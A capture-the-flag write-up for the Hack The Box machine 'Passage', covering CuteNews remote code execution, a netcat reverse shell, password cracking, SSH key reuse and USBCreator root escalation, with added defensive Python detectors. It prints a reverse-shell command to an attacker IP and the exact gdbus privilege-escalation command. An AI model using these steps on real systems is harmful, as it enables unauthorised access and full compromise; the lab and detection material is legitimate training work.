Passage - [HTB]


    Passage is a medium Linux machine where the attacker first has to deal with Fail2Ban in order to find the news login portal. Second, a user's credentials are found in the web page files. Third, a pair of SSH keys is used to become another user. Finally, the attacker has to exploit the USBCreator service in order to escalate privileges.


    As always, I start by scanning all ports on the machine.

    kali@kali:$ sudo nmap -sS -p- -n -oN AllPorts.txt
    Starting Nmap 7.80 ( ) at 2020-10-18 05:55 EDT
    Nmap scan report for
    Host is up (0.044s latency).
    Not shown: 65533 closed ports
    22/tcp open  ssh
    80/tcp open  http
    Nmap done: 1 IP address (1 host up) scanned in 33.18 seconds

    Then I run a further scan to obtain more information about each service.

    kali@kali:$ sudo nmap -sC -sV -p22,80 -n -oN PorsDepth.txt
    Nmap scan report for
    Host is up (0.043s latency).
    22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 17:eb:9e:23:ea:23:b6:b1:bc:c6:4f:db:98:d3:d4:a1 (RSA)
    |   256 71:64:51:50:c3:7f:18:47:03:98:3e:5e:b8:10:19:fc (ECDSA)
    |_  256 fd:56:2a:f8:d0:60:a7:f1:a0:a1:47:a4:38:d6:a8:a1 (ED25519)
    80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Passage News
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    Service detection performed. Please report any incorrect results at .
    Nmap done: 1 IP address (1 host up) scanned in 9.66 seconds

    Because nmap doesn't provide any helpful information, let's see what is on the Apache server.


    It seems to be a blog with several authors. One of the posts says that Fail2Ban (an intrusion prevention software framework that protects computer servers from brute-force attacks) has been installed to prevent attacks on the website. For this machine, tools like gobuster or dirbuster are therefore not feasible: because of the huge number of requests they make, our IP would be banned pretty easily.
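The counting behind that ban, as an added example (not code from the original post or from the Fail2Ban project): a sliding-window counter over Apache access-log lines that bans a client once it produces `MAX_RETRY` 4xx responses within `FIND_TIME`. The thresholds, addresses and log lines are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed thresholds, named after Fail2Ban's maxretry / findtime settings.
MAX_RETRY = 5
FIND_TIME = timedelta(seconds=10)

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) '
)

def find_offenders(lines, max_retry=MAX_RETRY, find_time=FIND_TIME):
    """Return {ip: time of ban} for clients with max_retry 4xx hits inside find_time."""
    recent = defaultdict(deque)        # ip -> timestamps of recent failures
    banned = {}
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["ip"] in banned or not m["status"].startswith("4"):
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        window = recent[m["ip"]]
        window.append(ts)
        while ts - window[0] > find_time:   # drop failures older than the window
            window.popleft()
        if len(window) >= max_retry:
            banned[m["ip"]] = ts
    return banned

def make_line(ip, sec, path, status):
    """Build one constructed access-log line."""
    return f'{ip} - - [18/Oct/2020:06:00:{sec:02d} +0000] "GET {path} HTTP/1.1" {status} 274'

# Constructed sample: one client requesting guessed paths quickly, one browsing normally.
SAMPLE = [make_line("10.10.14.5", s, f"/{w}", 404)
          for s, w in enumerate(["admin", "backup", "login", "test", "old", "dev"])]
SAMPLE += [make_line("10.10.14.9", 1, "/", 200),
           make_line("10.10.14.9", 20, "/favicon.ico", 404),
           make_line("10.10.14.9", 45, "/index.php", 200)]

if __name__ == "__main__":
    for ip, when in find_offenders(SAMPLE).items():
        print(f"ban {ip} at {when.isoformat()}")
```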


    Looking at the RSS link (Really Simple Syndication is a web feed that allows users and applications to access updates to websites in a standardized, computer-readable format), there seems to be another directory named CuteNews.


    Accessing the directory shows a login portal for CuteNews, a news manager.



    A look at searchsploit shows several exploits for this version.

    kali@kali:$ searchsploit CuteNews 2.1.2
     Exploit Title                                               |  Path
    CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) | php/remote/46698.rb
    CuteNews 2.1.2 - Arbitrary File Deletion                     | php/webapps/48447.txt
    CuteNews 2.1.2 - Authenticated Arbitrary File Upload         | php/webapps/48458.txt
    CuteNews 2.1.2 - Remote Code Execution                       | php/webapps/
    Shellcodes: No Results
    Papers: No Results

    The valid one is "CuteNews 2.1.2 - Remote Code Execution", which has an associated post so you can learn how to use it. (You only have to execute it with python3 and enter the specified URL http://passage.htb/.)

    kali@kali:$ python3 
               _____     __      _  __                     ___   ___  ___ 
              / ___/_ __/ /____ / |/ /__ _    _____       |_  | <  / |_  |
             / /__/ // / __/ -_)    / -_) |/|/ (_-<      / __/_ / / / __/ 
             \___/\_,_/\__/\__/_/|_/\__/|__,__/___/     /____(_)_(_)____/ 
                                    ___  _________                        
                                   / _ \/ ___/ __/                        
                                  / , _/ /__/ _/                          
    [->] Usage python3
    Enter the URL> http://passage.htb/
    Registering a users
    [+] Registration successful with username: E03jw7jFgS and password: E03jw7jFgS
    Sending Payload
    signature_key: 1bf82733ddc9e91148a30e03c6e841ed-E03jw7jFgS
    signature_dsi: 3c6488b866dd5fff2a26826f29bf44dd
    logged in user: E03jw7jFgS
    Dropping to a SHELL
    command > id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)

    Using netcat we can get our own reverse shell, so we can navigate the directories more easily.

    First, we need to start a listener on a port.

    kali@kali:$ nc -nlvp 4444

    Then, we need to execute the reverse shell using the exploit.

    command > nc -e /bin/bash <IP> 4444

    Finally, in order to use our reverse shell like a proper shell, we need to upgrade it by typing the following commands.

    python -c "import pty; pty.spawn('/bin/bash')"
    stty raw -echo
    export TERM=screen
    export SHELL=/bin/bash

    The one thing remaining is to give the reverse shell the same number of rows and columns as your terminal, so that we can use programs like vim, nano, etc. This is done by running the following commands (the number of rows and columns will vary from computer to computer).

    kali@kali:$ stty -a
    speed 38400 baud; rows 60; columns 235; line = 0;
    intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
    -parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
    -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon -ixoff -iuclc -ixany -imaxbel -iutf8
    opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
    isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extproc
    victim@pwnd:$ stty rows 60 columns 235

    Inside the /etc/passwd file there are two registered users, whose credentials must be found in order to get the user flag.

    www-data@passage:/var/www/html/CuteNews/cdata/users$ grep /bin/bash /etc/passwd
    paul:x:1001:1001:Paul Coles,,,:/home/paul:/bin/bash

    Privilege Escalation 1

    Looking into the folder /var/www/html/CuteNews/cdata/users, there are a lot of files containing base64-encoded information. Through trial and error, the credentials for the users nadav and paul turn out to be stored in the files "21.php" and "b0.php".







    However, the passwords are hashed. Using CrackStation, Paul's password can be obtained.


    Then, with paul's credentials we can switch to his account and obtain the user flag.

    www-data@passage:/var/www/html/CuteNews/cdata/users$ su paul
    Password:   atlanta1
    paul@passage:~$ wc -c /home/paul/user.txt 
    33 /home/paul/user.txt

    Privilege Escalation 2

    Inside paul's .ssh folder there is a public-private key pair, which can be used to get access to the machine through SSH as nadav.

    paul@passage:~$ ls -la .ssh/
    total 24
    drwxr-xr-x  2 paul paul 4096 Jul 21 10:43 .
    drwxr-x--- 16 paul paul 4096 Sep  2 07:18 ..
    -rw-r--r--  1 paul paul  395 Jul 21 10:43 authorized_keys
    -rw-------  1 paul paul 1679 Jul 21 10:43 id_rsa
    -rw-r--r--  1 paul paul  395 Jul 21 10:43
    -rw-r--r--  1 paul paul 1312 Jul 21 10:44 known_hosts
    paul@passage:~$ ssh -i .ssh/id_rsa nadav@localhost
    Last login: Sun Oct 18 07:10:32 2020 from
    nadav@passage:~$ id
    uid=1000(nadav) gid=1000(nadav) groups=1000(nadav),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
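The lateral move above works because one key pair is trusted by two accounts. As an added example (not part of the original post), this audit fingerprints every entry in each account's authorized_keys and reports keys authorized for more than one account. The key blobs below are constructed placeholders, and the input dictionary is an assumption standing in for the files read from each home directory.

```python
import base64
import hashlib
from collections import defaultdict

KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")

def fingerprint(line):
    """Return the SHA256 fingerprint (ssh-keygen -l style) of a public-key line, or None."""
    fields = line.split()
    for i, field in enumerate(fields[:-1]):
        if field.startswith(KEY_TYPES):        # skips a leading options field
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None

def shared_keys(authorized):
    """authorized: {account: authorized_keys text} -> {fingerprint: [accounts]} for keys on 2+ accounts."""
    owners = defaultdict(set)
    for account, text in authorized.items():
        for line in text.splitlines():
            line = line.strip()
            if line and not line.startswith("#"):
                fp = fingerprint(line)
                if fp:
                    owners[fp].add(account)
    return {fp: sorted(accts) for fp, accts in owners.items() if len(accts) > 1}

# Constructed sample: placeholder blobs stand in for real key material.
KEY_A = "ssh-rsa " + base64.b64encode(b"constructed-key-A").decode()
KEY_B = "ssh-ed25519 " + base64.b64encode(b"constructed-key-B").decode()
SAMPLE = {
    "paul": f"{KEY_A} paul@example\n",
    "nadav": f'# workstation\nfrom="10.0.0.0/8" {KEY_A} shared\n{KEY_B} nadav@example\n',
}

if __name__ == "__main__":
    for fp, accounts in shared_keys(SAMPLE).items():
        print(f"{fp} is authorized for: {', '.join(accounts)}")
```

A private key stored on the server whose public half appears in this report is the situation the write-up relies on: compromising one account hands over the other.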

    Privilege Escalation 3

    In nadav's .viminfo file there are two paths, one of them containing the name USBCreator.

    nadav@passage:~$ cat .viminfo
    > /etc/dbus-1/system.d/com.ubuntu.USBCreator.conf
            "       12      7
    > /etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf
            "       2       0
            .       2       0
            +       2       0

    Searching the Internet for privilege escalation through USBCreator turns up a post explaining how to exploit it.

    Finally, by executing the following commands we add our SSH keys to root's authorized_keys file, so we can SSH into the machine as root and obtain the flag.

    nadav@passage:~$ gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator --method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys /root/.ssh/authorized_keys true
    nadav@passage:~$ ssh -i .ssh/id_rsa root@localhost
    root@passage:~# wc -c root.txt 
    33 root.txt
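For detection, the root-level file copy above leaves a recognisable process command line. As an added example (not from the original post), this parser flags `gdbus call` invocations of `com.ubuntu.USBCreator.Image` and raises the severity when either path falls under a sensitive tree. The `SENSITIVE` list is an assumption, the sample lines are constructed apart from the command shown in the write-up, and the method arguments are assumed to follow `--method` directly as they do there.

```python
import posixpath
import shlex

METHOD = "com.ubuntu.USBCreator.Image"
# Assumed watch list: trees an unprivileged user should not reach through a root helper.
SENSITIVE = ("/root", "/etc", "/boot", "/var/spool/cron")

def is_sensitive(path):
    p = posixpath.normpath(path)          # collapse ../ before comparing
    return any(p == s or p.startswith(s + "/") for s in SENSITIVE)

def inspect(cmdline):
    """Return a finding for a gdbus call to USBCreator's Image method, else None."""
    try:
        argv = shlex.split(cmdline)
    except ValueError:                    # unbalanced quotes in the logged line
        return None
    if len(argv) < 2 or posixpath.basename(argv[0]) != "gdbus" or argv[1] != "call":
        return None
    method, args = None, []
    for i, arg in enumerate(argv):
        if arg == "--method" and i + 1 < len(argv):
            method, args = argv[i + 1], argv[i + 2:]
            break
        if arg.startswith("--method="):
            method, args = arg.split("=", 1)[1], argv[i + 1:]
            break
    if method != METHOD or len(args) < 2:
        return None
    source, target = args[0], args[1]
    severity = "high" if is_sensitive(source) or is_sensitive(target) else "review"
    return {"source": source, "target": target, "severity": severity}

def scan(cmdlines):
    """Return the findings for every matching command line."""
    return [f for f in map(inspect, cmdlines) if f]

# Constructed sample of logged command lines; the first is the command from the write-up.
SAMPLE = [
    "gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator "
    "--method com.ubuntu.USBCreator.Image /home/nadav/.ssh/authorized_keys "
    "/root/.ssh/authorized_keys true",
    "gdbus call --system --dest com.ubuntu.USBCreator --object-path /com/ubuntu/USBCreator "
    "--method=com.ubuntu.USBCreator.Image /home/nadav/ubuntu.iso /dev/sdb true",
    "gdbus call --session --dest org.freedesktop.DBus --object-path /org/freedesktop/DBus "
    "--method org.freedesktop.DBus.ListNames",
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```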